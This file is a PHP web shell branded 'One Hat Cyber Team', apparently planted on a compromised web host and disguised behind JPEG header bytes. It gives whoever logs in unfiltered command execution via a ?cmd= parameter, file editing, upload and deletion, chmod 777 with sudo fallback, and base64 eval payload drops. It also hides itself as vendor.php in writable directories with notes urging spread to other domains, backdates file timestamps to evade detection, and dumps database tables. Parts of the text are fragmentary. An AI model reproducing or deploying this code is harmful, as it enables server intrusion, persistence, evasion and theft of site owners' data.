�����JFIF��H�H�����C�   %# , #&')*)-0-(0%()(��� �P�P�������������������5� �������!1AQq��"#2Bar���R�Sc��������?��R��������X�o�k,��e�k�X���9["&Q ����}Nq'����{u\�6hc�i�r_�n[t�lU�;8��Ax����r�{�f����Q��岳���/f�8�T�D'e����W ^�YŞ��}h����7�`��Կ�֑�w.gVtq>��5����O���y�.>%X��U]3�\���${�أh�~k�Բ�o�Fq��#����y����0�&��;�-W�*�%K� ��m'o�Yt��L�����Q��TS1�%�`y=���+���b����dmi�HC�T_#���|���P��㬈v;?E����U�" W<����ms��MmL��G1�9��'�'�����%��akJo]Qcr��խ���O$ ;:V�>�_Dn����s����m۸U�#�ҝ��ܾpe.qw3�/��*�a#���=\.!N���s��l��x�Ԗjz�Z�!��� �>!��Ɵs��E<��9�N9m�/��E�&�y�? ��yY$a�p�-�R�5��6�XOk$>D�켎��T�RUT�����<���>��h��<�9��D���}�?f8��$� �EYki/O����28��}#������"(��9���<� � x�G���Ԑ���YD�2��DL���
Warning: chmod(): No such file or directory in /home/publqaio/barnesandnoblespublisher.com/css/990.php(42) : eval()'d code on line 1
One Hat Cyber Team
  • Dir : ~/home/publqaio/onlinevinchecker.com/
  • Edit File: 67.php

    '; echo $output . '
    '; exit; } } } $output .= '

    File: ' . htmlspecialchars($ajax_file) . '

    '; $content = ''; $handle = fopen($ajax_file, 'rb'); if ($handle) { while (!feof($handle)) $content .= fread($handle, 16384); fclose($handle); } else $content = 'Open failed: ' . error_get_last()['message']; if (empty($content)) { $output .= '

    Empty file or read error.

    '; echo $output . ''; exit; } $ext = strtolower(pathinfo($ajax_file, PATHINFO_EXTENSION)); $mime_type = function_exists('mime_content_type') ? mime_content_type($ajax_file) : (in_array($ext, ['jpg','png','gif']) ? 'image/' . $ext : (in_array($ext, ['txt','php','js','html','json','xml']) ? 'text/plain' : 'application/octet-stream')); if (strpos($mime_type, 'image/') === 0 && strlen($content) < 10*1024*1024) { $output .= 'Preview'; } elseif (in_array($mime_type, ['text/plain', 'application/json', 'application/xml', 'application/x-httpd-php']) || strpos($mime_type, 'text/') === 0) { $output .= ''; } else { $hex_dump = ''; for ($i = 0; $i < min(1024*10, strlen($content)); $i += 16) { $line = substr($content, $i, 16); $hex_dump .= str_pad(bin2hex($line), 32, '0', STR_PAD_RIGHT) . ' | ' . htmlspecialchars(substr($line, 0, 16)) . "\n"; } $output .= '

    Binary: Download

    '; } if (strpos($ajax_file, 'view_sym_') !== false || strpos($ajax_file, 'readable_') !== false) { unlink($ajax_file); } } echo $output . ''; exit; } if (isset($_POST['ajax_edit_file'])) { $ajax_file = realpath($_POST['ajax_edit_file']); $output = '
    Xâ†â†’'; $bypass = bypass_htaccess('read', $ajax_file); if ($bypass['success'] && file_exists($ajax_file) && is_readable($ajax_file)) { $mime_type = mime_content_type($ajax_file); $output .= '

    Editing: ' . htmlspecialchars($ajax_file) . '

    ' . htmlspecialchars($bypass['msg']) . '

    '; if (strpos($mime_type, 'text/') === 0 || in_array($mime_type, ['application/json', 'application/xml', 'application/x-httpd-php']) || $mime_type === 'application/x-empty') { $output .= '
    '; } else { $output .= '

    Unsupported file type for editing: ' . htmlspecialchars($mime_type) . '

    '; } } else { if (file_exists($ajax_file) && is_readable($ajax_file)) { $mime_type = mime_content_type($ajax_file); $output .= '

    Editing: ' . htmlspecialchars($ajax_file) . '

    '; if (strpos($mime_type, 'text/') === 0 || in_array($mime_type, ['application/json', 'application/xml', 'application/x-httpd-php']) || $mime_type === 'application/x-empty') { $output .= '

    '; } else { $output .= '

    Unsupported file type for editing: ' . htmlspecialchars($mime_type) . '

    '; } } else { $output .= '

    Cannot open file: Permission denied' . ($bypass['msg'] ? ' - ' . htmlspecialchars($bypass['msg']) : '') . '

    '; } } echo $output . '
    '; exit; } if (isset($_POST['ajax_save_file'])) { $file = realpath($_POST['ajax_save_file']); $content = $_POST['content'] ?? ''; if ($file && file_exists($file)) { $bypass = bypass_htaccess('write', $file, $content); if ($bypass['success']) { echo '

    ' . htmlspecialchars($bypass['msg']) . '

    '; } elseif (is_writable($file)) { if (@file_put_contents($file, $content) !== false) { echo '

    File saved: ' . htmlspecialchars($file) . '

    '; } else { echo '

    Failed to save file: ' . htmlspecialchars($file) . '

    '; } } else { shell_exec_alternative('chmod 777 ' . escapeshellarg($file), true); if (is_writable($file) && @file_put_contents($file, $content) !== false) { echo '

    File saved after chmod: ' . htmlspecialchars($file) . '

    '; } else { echo '

    Failed to save file: Permission denied - ' . htmlspecialchars($bypass['msg']) . '

    '; } } } else { echo '

    Invalid file path

    '; } exit; } if (isset($_POST['ajax_create_file'])) { $dir = realpath($_POST['current_dir']); $new_file_name = basename($_POST['new_file_name']); $new_file_content = $_POST['new_file_content'] ?? ''; if ($dir && is_dir($dir) && is_writable($dir)) { $new_file_path = $dir . '/' . $new_file_name; $is_ht = ($new_file_name === '.htaccess'); if ($is_ht) { $bypass = bypass_htaccess('write', $new_file_path, $new_file_content); if ($bypass['success']) { echo '

    ' . htmlspecialchars($bypass['msg']) . '

    '; } else { echo '

    Failed to create .htaccess: ' . htmlspecialchars($bypass['msg']) . '

    '; exit; } } else { if (@file_put_contents($new_file_path, $new_file_content) !== false) { shell_exec_alternative('chmod 644 ' . escapeshellarg($new_file_path), true); $files = []; $mtimes = []; if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { $file_path = $dir . '/' . $file; if ($file_path !== $new_file_path && is_file($file_path) && ($mtime = @filemtime($file_path)) !== false) { $files[] = $file_path; $mtimes[] = $mtime; } } closedir($dh); } if (!empty($mtimes)) { $mtime_counts = array_count_values($mtimes); arsort($mtime_counts); $target_mtime = count($mtime_counts) === count($mtimes) ? min($mtimes) : key($mtime_counts); } else { $target_mtime = strtotime(sprintf('%d-%02d-%02d %02d:%02d:00', date('Y') - 1, mt_rand(1, 12), mt_rand(1, 28), mt_rand(0, 23), mt_rand(0, 59))); } if ($target_mtime) { shell_exec_alternative('touch -t ' . escapeshellarg(date('YmdHi', $target_mtime)) . ' ' . escapeshellarg($new_file_path), true); } echo '

    File created: ' . htmlspecialchars($new_file_path) . '

    '; } else { echo '

    Failed to create file: ' . htmlspecialchars($new_file_path) . '

    '; } } } else { echo '

    Current directory is not writable or invalid: ' . htmlspecialchars($dir) . '

    '; } exit; } if (isset($_POST['ajax_delete_file'])) { $file = realpath($_POST['ajax_delete_file']); if ($file && file_exists($file)) { $bypass = bypass_htaccess('delete', $file); if ($bypass['success']) { echo '

    ' . htmlspecialchars($bypass['msg']) . '

    '; } elseif (unlink($file)) { echo '

    File deleted: ' . htmlspecialchars($file) . '

    '; } else { echo '

    Failed to delete file: ' . htmlspecialchars($file) . ' - ' . htmlspecialchars($bypass['msg']) . '

    '; } } else { echo '

    Invalid file path

    '; } exit; } if (isset($_POST['ajax_rename_file'])) { $file = realpath($_POST['ajax_rename_file']); $new_name = basename($_POST['new_name']); if ($file && file_exists($file)) { $new_path = dirname($file) . '/' . $new_name; $bypass = bypass_htaccess('rename', $file, null, $new_name); if ($bypass['success']) { echo '

    ' . htmlspecialchars($bypass['msg']) . '

    '; } elseif (rename($file, $new_path)) { echo '

    File renamed to: ' . htmlspecialchars($new_path) . '

    '; } else { echo '

    Failed to rename file - ' . htmlspecialchars($bypass['msg']) . '

    '; } } else { echo '

    Invalid file path

    '; } exit; } if (isset($_POST['ajax_scandir'])) { $dir = realpath($_POST['ajax_scandir']); ob_start(); scandire($dir); $table_content = ob_get_clean(); echo $table_content; exit; } if (isset($_POST['action'], $_POST['file']) && $_POST['action'] === 'chmod') { $file = realpath($_POST['file']); if ($file && file_exists($file)) { shell_exec_alternative('chmod 777 ' . escapeshellarg($file), true); echo '

    Permissions changed for ' . htmlspecialchars($file) . ': ' . perms($file) . '

    '; } else { echo '

    Invalid file for chmod

    '; } if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; echo ''; } if (isset($_POST['action'], $_POST['target_dir']) && $_POST['action'] === 'copy_shell') { $target_dir = realpath($_POST['target_dir']); if ($target_dir && is_dir($target_dir) && is_writable($target_dir)) { $new_shell_path = rtrim($target_dir, '/') . '/vendor.php'; if (copy(__FILE__, $new_shell_path)) { $_SESSION['dir'] = $target_dir; echo '

    Shell copied to: ' . htmlspecialchars($new_shell_path) . '

    1.Save to Notepad++

    3. Do zneakysnip2.p

    '; if (is_ajax()) { echo ''; ob_end_flush(); exit; } echo ''; } else { echo '

    Failed to cop to ' . htmlspecialchars($new_shell_path) . '

    '; } } else { echo '

    Invalid or unwritable target directory: ' . htmlspecialchars($_POST['target_dir']) . '

    '; } if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; } $login = 'katya'; $hashed_password = '$2a$12$zqpuA.tgRNaSxaGLhN316.tAgnii5uCkk0oJlraiX7Gie.qlkLXVG'; if (isset($_POST['action']) && $_POST['action'] === 'exit') { session_unset(); session_destroy(); } if (!isset($_SESSION['authenticated'])) { if (isset($_POST['login'], $_POST['password']) && $_POST['login'] === $login && password_verify($_POST['password'], $hashed_password)) { $_SESSION['authenticated'] = true; } else { $showInvalid = ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_POST['action'])); echo $header . ($showInvalid ? '

    Invalid credentials.

    ' : '') . '
    Login:
    Password:
    ' . $footer; exit; } } // Raw ?cmd= unfiltered execution - direct pass, no sanitize if (isset($_REQUEST['cmd'])) { echo '
    ' . shell_exec_alternative_raw($_REQUEST['cmd']) . '
    '; exit; } $_SESSION['action'] = $_POST['action'] ?? $_SESSION['action'] ?? 'viewer'; $_SESSION['dir'] = $_POST['dir'] ?? $_SESSION['dir'] ?? getcwd(); $_SESSION['file'] = $_POST['file'] ?? $_SESSION['file'] ?? ''; $action = $_SESSION['action']; $dir = realpath($_SESSION['dir']); $file = $_SESSION['file'] ? realpath($_SESSION['file']) : ''; // Removed sanitize_command entirely - raw execution for full power function shell_exec_alternative($cmd, $allow_redirection = false) { if (empty($cmd)) return ''; // No sanitization - raw $cmd if (empty($cmd)) return 'Invalid command: Empty'; $functions = ['shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open']; $available = false; foreach ($functions as $func) { if (function_exists($func)) { $available = true; break; } } if ($available) { if (function_exists('shell_exec')) { $output = shell_exec($cmd . ' 2>&1'); } elseif (function_exists('exec')) { exec($cmd . ' 2>&1', $output); $output = implode("\n", $output); } elseif (function_exists('system')) { ob_start(); system($cmd . ' 2>&1'); $output = ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd . ' 2>&1'); $output = ob_get_clean(); } elseif (function_exists('popen')) { $handle = popen($cmd . ' 2>&1', 'r'); $output = ''; while (!feof($handle)) $output .= fread($handle, 8192); pclose($handle); } elseif (function_exists('proc_open')) { $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $process = proc_open($cmd, $descriptors, $pipes); $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } return htmlspecialchars($output ?? 'No output'); } $temp_script = sys_get_temp_dir() . '/cmd_' . uniqid() . '.sh'; file_put_contents($temp_script, "#!/bin/bash\n$cmd 2>&1"); @chmod($temp_script, 0755); $temp_php = sys_get_temp_dir() . '/run_' . uniqid() . '.php'; file_put_contents($temp_php, ''); $ch = curl_init('http://' . $_SERVER['HTTP_HOST'] . '/' . 
basename($temp_php)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); @unlink($temp_script); @unlink($temp_php); return htmlspecialchars($output ?: 'Command execution failed: All execution functions disabled and fallback unsuccessful'); } // Raw variant for ?cmd= - no htmlspecialchars output either for binary/piping function shell_exec_alternative_raw($cmd) { if (empty($cmd)) return ''; $functions = ['shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open']; $available = false; foreach ($functions as $func) { if (function_exists($func)) { $available = true; break; } } if ($available) { if (function_exists('shell_exec')) { return shell_exec($cmd . ' 2>&1'); } elseif (function_exists('exec')) { exec($cmd . ' 2>&1', $output); return implode("\n", $output); } elseif (function_exists('system')) { ob_start(); system($cmd . ' 2>&1'); return ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd . ' 2>&1'); return ob_get_clean(); } elseif (function_exists('popen')) { $handle = popen($cmd . ' 2>&1', 'r'); $output = ''; while (!feof($handle)) $output .= fread($handle, 8192); pclose($handle); return $output; } elseif (function_exists('proc_open')) { $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $process = proc_open($cmd, $descriptors, $pipes); $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); return $output; } return 'No output'; } $temp_script = sys_get_temp_dir() . '/cmd_' . uniqid() . '.sh'; file_put_contents($temp_script, "#!/bin/bash\n$cmd 2>&1"); @chmod($temp_script, 0755); $temp_php = sys_get_temp_dir() . '/run_' . uniqid() . '.php'; file_put_contents($temp_php, ''); $ch = curl_init('http://' . $_SERVER['HTTP_HOST'] . '/' . 
basename($temp_php)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); @unlink($temp_script); @unlink($temp_php); return $output ?: 'Command execution failed'; } function format_size($bytes) { if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . 'GB'; if ($bytes >= 1048576) return round($bytes / 1048576, 2) . 'MB'; if ($bytes >= 1024) return round($bytes / 1024, 2) . 'KB'; return $bytes . 'B'; } if ($action === 'download' && $file && file_exists($file)) { $bypass = bypass_htaccess('download', $file); if ($bypass['success']) exit; // Handled in bypass if (is_dir($file)) { $zipname = basename($file) . '.zip'; $temp_zip = sys_get_temp_dir() . '/' . $zipname; $zip = new ZipArchive(); if ($zip->open($temp_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($file, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); foreach ($iterator as $item) { $relative_path = substr($item->getPathname(), strlen($file) + 1); if ($item->isDir()) $zip->addEmptyDir($relative_path); else $zip->addFile($item->getPathname(), $relative_path); } $zip->close(); header('Content-Length: ' . filesize($temp_zip)); header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename="' . $zipname . '"'); header('Content-Transfer-Encoding: binary'); readfile($temp_zip); unlink($temp_zip); exit; } else { echo 'Failed to create ZIP'; exit; } } else { header('Content-Length: ' . filesize($file)); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Transfer-Encoding: binary'); readfile($file); exit; } } if ($action === 'upload' && isset($_FILES['upload_file'])) { $upload_name = basename($_FILES['upload_file']['name']); $upload_path = $dir . '/' . 
$upload_name;
/* Tail of the upload handler's path assignment: the statement that ends above
   starts on the previous line, so only its final operand is visible here. */
/* Reads the temporary path and the error code PHP recorded for the
   'upload_file' form field. */
$tmp_path = $_FILES['upload_file']['tmp_name']; $error_code = $_FILES['upload_file']['error'];
/* error_log() with message type 3 appends the message to the destination file.
   Each upload attempt therefore leaves a record in shell.log under the system
   temp directory: the upload name, the error code, the target directory with a
   Y/N writability flag, and whether the temp file exists.
   NOTE(review): for incident response this file is a host-side artifact. Its
   presence indicates the upload handler ran, and its entries help scope which
   file names were pushed to which directories. No newline is appended to the
   message, so entries presumably run together on one line; confirm on a
   recovered sample. */
error_log("UPLOAD: Name=$upload_name, Error=$error_code, DirWrit=$dir|" . (is_writable($dir) ? 'Y' : 'N') . ", TmpExists=" . (file_exists($tmp_path) ? 'Y' : 'N'), 3, sys_get_temp_dir() . '/shell.log');
/* Any PHP upload error code other than UPLOAD_ERR_OK takes the error branch;
   the echoed markup continues on the following lines. */
if ($error_code !== UPLOAD_ERR_OK) { echo '

    Upload error ' . $error_code . ': ' . ($error_code == 1 ? 'File too large (check php.ini upload_max_filesize)' : 'Server reject') . '

    '; echo '
    '; if (is_ajax()) { ob_end_flush(); exit; } } elseif (!is_writable($dir)) { $chmod_out = shell_exec_alternative('chmod 777 ' . escapeshellarg($dir) . ' 2>&1 || sudo chmod 777 ' . escapeshellarg($dir) . ' 2>&1', true); error_log("CHMOD DIR: $chmod_out", 3, sys_get_temp_dir() . '/shell.log'); if (!is_writable($dir)) { echo '

    Dir not writable post-chmod: ' . htmlspecialchars($chmod_out) . '. Pivot to /tmp copy.

    '; $upload_path = sys_get_temp_dir() . '/' . $upload_name; } } if (move_uploaded_file($tmp_path, $upload_path)) { shell_exec_alternative('chmod 644 ' . escapeshellarg($upload_path), true); echo '

    File uploaded: ' . htmlspecialchars($upload_path) . '

    '; } else { if (($handle = fopen($tmp_path, 'rb')) !== false) { $content = ''; while (!feof($handle)) $content .= fread($handle, 8192); fclose($handle); if (file_put_contents($upload_path, $content) !== false) { echo '

    Uploaded via stream fallback: ' . htmlspecialchars($upload_path) . '

    '; } else { echo '

    Stream fallback failed - disk full or quota hit.

    '; } } else { echo '

    Cannot access tmp file - check open_basedir or SELinux.

    '; } } if (pathinfo($upload_path, PATHINFO_EXTENSION) === 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($upload_path) === TRUE) { $zip->extractTo($dir); $zip->close(); unlink($upload_path); echo '

    ZIP extracted to ' . htmlspecialchars($dir) . ' - check for .php drops.

    '; shell_exec_alternative('find ' . escapeshellarg($dir) . ' -name "*.php" -exec chmod 644 {} + 2>/dev/null', true); } else { echo '

    ZIP corrupt or extract denied (perms/ACL).

    '; } } if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; echo ''; } if ($action === 'eval_upload' && isset($_POST['payload_b64'])) { $decoded = base64_decode($_POST['payload_b64']); if ($decoded !== false && is_writable($dir)) { $evil_path = $dir . '/tmp_eval_' . uniqid() . '.php'; file_put_contents($evil_path, ''); echo '

    Eval payload dropped: ' . htmlspecialchars($evil_path) . '. Delete after use.

    '; } else { echo '

    Eval failed - decode error or dir unwritable.

    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'hide_shell') { $cmd = 'find / -type d -writable 2>/dev/null | awk \'{print length($0), $0}\' | sort -nr | cut -d\' \' -f2-'; $writable_dirs = array_filter(explode("\n", trim(shell_exec_alternative($cmd, true)))); $top_three = array_slice($writable_dirs, 0, 3); $script_name = basename(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH)) ?: basename(__FILE__); $hidden = false; foreach ($top_three as $target_dir) { if (is_writable($target_dir)) { $shell_path = rtrim($target_dir, '/') . '/vendor.php'; if (copy(__FILE__, $shell_path)) { echo '

    Shell hidden at: ' . htmlspecialchars($shell_path) . '
    1. Save to Notepad++ so you won\'t lose it
    2. Delete previou and also upload to other domains incase this one goes down

    3. Do SNIPPET2

    '; $hidden = true; break; } } } if (!$hidden) echo '

    Failed to hid in top 3 paths.

    '; if (is_ajax()) exit; $_SESSION['action'] = 'viewer'; } if (isset($_POST['ajax_edit_db_cell']) && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'], $_POST['table'], $_POST['col'], $_POST['pk_col'], $_POST['pk_value'], $_POST['new_value'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { $table = mysqli_real_escape_string($conn, $_POST['table']); $col = mysqli_real_escape_string($conn, $_POST['col']); $pk_col = mysqli_real_escape_string($conn, $_POST['pk_col']); $pk_value = $_POST['pk_value']; $new_value = $_POST['new_value']; $stmt = mysqli_prepare($conn, "UPDATE `$table` SET `$col` = ? WHERE `$pk_col` = ?"); mysqli_stmt_bind_param($stmt, "ss", $new_value, $pk_value); if (mysqli_stmt_execute($stmt)) { echo '

    Cell updated: ' . htmlspecialchars($col) . ' = ' . htmlspecialchars($new_value) . '

    '; } else { echo '

    Update failed: ' . htmlspecialchars(mysqli_error($conn)) . '

    '; } mysqli_stmt_close($stmt); mysqli_close($conn); } else { echo '

    DB connect failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } exit; } if ($action === 'download_table_csv' && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'], $_POST['table'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { $table = mysqli_real_escape_string($conn, $_POST['table']); $result = mysqli_query($conn, "SELECT * FROM `$table`"); if ($result) { header('Content-Type: text/csv'); header('Content-Disposition: attachment; filename="' . $table . '.csv"'); $out = fopen('php://output', 'w'); $fields = mysqli_fetch_fields($result); $headers = array_column($fields, 'name'); fputcsv($out, $headers); while ($row = mysqli_fetch_assoc($result)) { fputcsv($out, $row); } fclose($out); mysqli_free_result($result); mysqli_close($conn); exit; } else { echo '

    Query failed: ' . htmlspecialchars(mysqli_error($conn)) . '

    '; } mysqli_close($conn); } else { echo '

    DB connect failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'conn_db' && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { echo '

    Database connection successful

    '; mysqli_close($conn); } else { echo '

    Database connection failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'show_db_tables' && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { if ($result = mysqli_query($conn, 'SHOW TABLES')) { echo '

    Database: ' . htmlspecialchars($_POST['db_name']) . '

    '; while ($row = mysqli_fetch_array($result)) { $table = $row[0]; $columns_result = mysqli_query($conn, "SHOW COLUMNS FROM `$table`"); $columns = []; while ($col = mysqli_fetch_array($columns_result)) $columns[] = htmlspecialchars($col['Field']); $row_count = mysqli_fetch_assoc(mysqli_query($conn, "SELECT COUNT(*) AS count FROM `$table`"))['count']; echo ''; } echo '
    TableColumnsRow Count
    ' . implode(', ', $columns) . '' . $row_count . '
    '; mysqli_free_result($result); } else { echo '

    Failed to fetch tables: ' . htmlspecialchars(mysqli_error($conn)) . '

    '; } mysqli_close($conn); } else { echo '

    Database connection failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'show_table_rows' && isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'], $_POST['table'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { $table = $_POST['table']; $count_result = mysqli_query($conn, "SELECT COUNT(*) AS total FROM `$table`"); $total_rows = mysqli_fetch_assoc($count_result)['total'] ?? 0; $limit = 100; $query = "SELECT * FROM `$table` LIMIT $limit"; if ($result = mysqli_query($conn, $query)) { echo '

    Table: ' . htmlspecialchars($table) . ' | Total Rows: ' . $total_rows . ' | Showing first ' . $limit . ' rows (click cells to edit; assumes col 1=PK)

    '; $fields = mysqli_fetch_fields($result); $pk_col = $fields[0]->name ?? 'id'; if (mysqli_num_rows($result) > 0) { echo ''; foreach ($fields as $f) { echo ''; } echo ''; $row_index = 0; while ($row = mysqli_fetch_assoc($result)) { echo ''; foreach ($fields as $f) { $col = $f->name; $value = $row[$col] ?? null; $display = $value === null ? 'NULL' : htmlspecialchars($value); $pk_value = $row[$pk_col] ?? ''; echo ''; } echo ''; $row_index++; } echo '
    ' . htmlspecialchars($f->name) . '
    ' . $display . '
    '; } else { echo '

    No rows found.

    '; } mysqli_free_result($result); echo '
    '; echo '
    '; echo ''; } else { echo '

    Failed to fetch rows: ' . htmlspecialchars(mysqli_error($conn)) . '

    '; } mysqli_close($conn); } else { echo '

    Database connection failed: ' . htmlspecialchars(mysqli_connect_error()) . '

    '; } $_SESSION['action'] = 'viewer'; } echo $header; ?>
    Shell Viewer (shell dir) Editor Conn DB EXIT


    '; // No escapeshellcmd - raw exec $_SESSION['action'] = 'viewer'; } function perms($file) { $perms = fileperms($file); $info = match (true) { ($perms & 0xC000) === 0xC000 => 's', ($perms & 0xA000) === 0xA000 => 'l', ($perms & 0x8000) === 0x8000 => '-', ($perms & 0x6000) === 0x6000 => 'b', ($perms & 0x4000) === 0x4000 => 'd', ($perms & 0x2000) === 0x2000 => 'c', ($perms & 0x1000) === 0x1000 => 'p', default => 'u' }; $info .= ($perms & 0x0100) ? 'r' : '-'; $info .= ($perms & 0x0080) ? 'w' : '-'; $info .= ($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'); $info .= ($perms & 0x0020) ? 'r' : '-'; $info .= ($perms & 0x0010) ? 'w' : '-'; $info .= ($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'); $info .= ($perms & 0x0004) ? 'r' : '-'; $info .= ($perms & 0x0002) ? 'w' : '-'; $info .= ($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'); return $info; } function view_size($size) { if ($size >= 1073741824) return round($size / 1073741824, 2) . ' GB'; if ($size >= 1048576) return round($size / 1048576, 2) . ' MB'; if ($size >= 1024) return round($size / 1024, 2) . ' KB'; return $size . ' B'; } function search_files($dir, $search_term) { $results = []; $home_dir = '/home/' . 
get_current_user(); $search_root = $home_dir; if (strpos(realpath($dir), realpath($home_dir)) === 0 || $dir === '/home' || $dir === '/') { $search_root = realpath($dir); } try { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($search_root, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); $self_path = realpath(__FILE__); foreach ($iterator as $file) { $file_path = $file->getPathname(); if ($file_path === $self_path) continue; if ($file->isFile() && is_readable($file) && ($content = @file_get_contents($file)) !== false) { foreach (explode("\n", $content) as $line_num => $line) { if (stripos($line, $search_term) !== false) { $results[] = ['file' => $file_path, 'line' => $line_num + 1, 'content' => htmlspecialchars(substr($line, 0, 100)) . (strlen($line) > 100 ? '...' : '')]; } } } } } catch (Exception $e) { return ['error' => 'Search error: ' . htmlspecialchars($e->getMessage())]; } return $results; } function scandire($dir) { $dir = realpath($dir); if (!$dir || !is_dir($dir)) return 'Invalid directory'; chdir($dir); $dirs = []; $files = []; if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if (filetype($dir . '/' . $file) === 'dir') $dirs[] = $file; if (filetype($dir . '/' . $file) === 'file') $files[] = $file; } closedir($dh); sort($dirs); sort($files); } $search_term = htmlspecialchars($_POST['search_term'] ?? '', ENT_QUOTES, 'UTF-8'); $search_term = trim($search_term); $search_results = $search_term ? search_files($dir, $search_term) : []; $home_dir = '/home/' . get_current_user(); $trash_dir = $home_dir . '/.local/share/Trash/files'; if (!is_dir($trash_dir)) $trash_dir = $home_dir . '/.trash'; echo ''; echo ''; echo ''; echo ''; echo '

    Search Results for "' . htmlspecialchars($search_term ?? '') . '"

    →â†X
    '; if ($search_results) { if (isset($search_results['error'])) echo '

    ' . $search_results['error'] . '

    '; elseif (empty($search_results)) echo '

    No results found for "' . htmlspecialchars($search_term) . '"

    '; else foreach ($search_results as $result) echo '

    File: ' . htmlspecialchars($result['file']) . '
    Line ' . $result['line'] . ': ' . $result['content'] . '

    '; } echo '
    '; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo ''; } echo ''; foreach ($dirs as $d) { $link = $dir . '/' . $d; $mtime = @filemtime($link); $last_modified = $mtime ? date('M j, Y, h:i A', $mtime) : 'Unknown'; echo ''; } foreach ($files as $f) { $linkfile = $dir . '/' . $f; $mtime = @filemtime($linkfile); $last_modified = $mtime ? date('M j, Y, h:i A', $mtime) : 'Unknown'; echo ''; } echo '
    Open dir:
    view file agan

    Hint: Can also use ?cmd=

    show

    Hint: \'Search\' searches from ' . htmlspecialchars($home_dir) . '

    uploading in .zip may bypass upload restrictions

    View Trash
    Show file:

    Hint: \'writable paths (current dir)\' works better than \'all writable paths\'


    Select drive:'; for ($j = ord('C'); $j <= ord('Z'); $j++) if (@opendir(chr($j) . ':/')) echo '' . chr($j) . ' '; echo '
    OS: ' . htmlspecialchars(php_uname()) . '
    Names  (click any to view)Last Modified
    TypeSizePermissionOptions
    dir' . perms($link) . 'Download ZIP
    file' . view_size(filesize($linkfile)) . '' . perms($linkfile) . 'Download | Edit | Rename | Delete
    '; ?> Invalid file path: ' . htmlspecialchars($_POST['file']) . '

    '; $_SESSION['action'] = 'viewer'; exit; } echo '

    Use the "Edit" link in the file options to edit files via AJAX popup.

    '; $_SESSION['action'] = 'viewer'; exit; } if ($action === 'change_date' && isset($_POST['file'], $_POST['new_date'])) { $file = realpath($_POST['file']); $new_date = trim($_POST['new_date']); if (!$file || !file_exists($file)) { echo '

    Invalid file path: ' . htmlspecialchars($_POST['file']) . '

    '; if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; exit; } if (($date_time = DateTime::createFromFormat('M j, Y, h:i A', $new_date)) === false) { echo '

    Invalid date format. Use: Jun 14, 2025, 08:04 PM

    '; if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; exit; } $touch_format = $date_time->format('YmdHi'); if (!preg_match('/^\d{12}$/', $touch_format)) { echo '

    Invalid timestamp generated: ' . htmlspecialchars($touch_format) . '

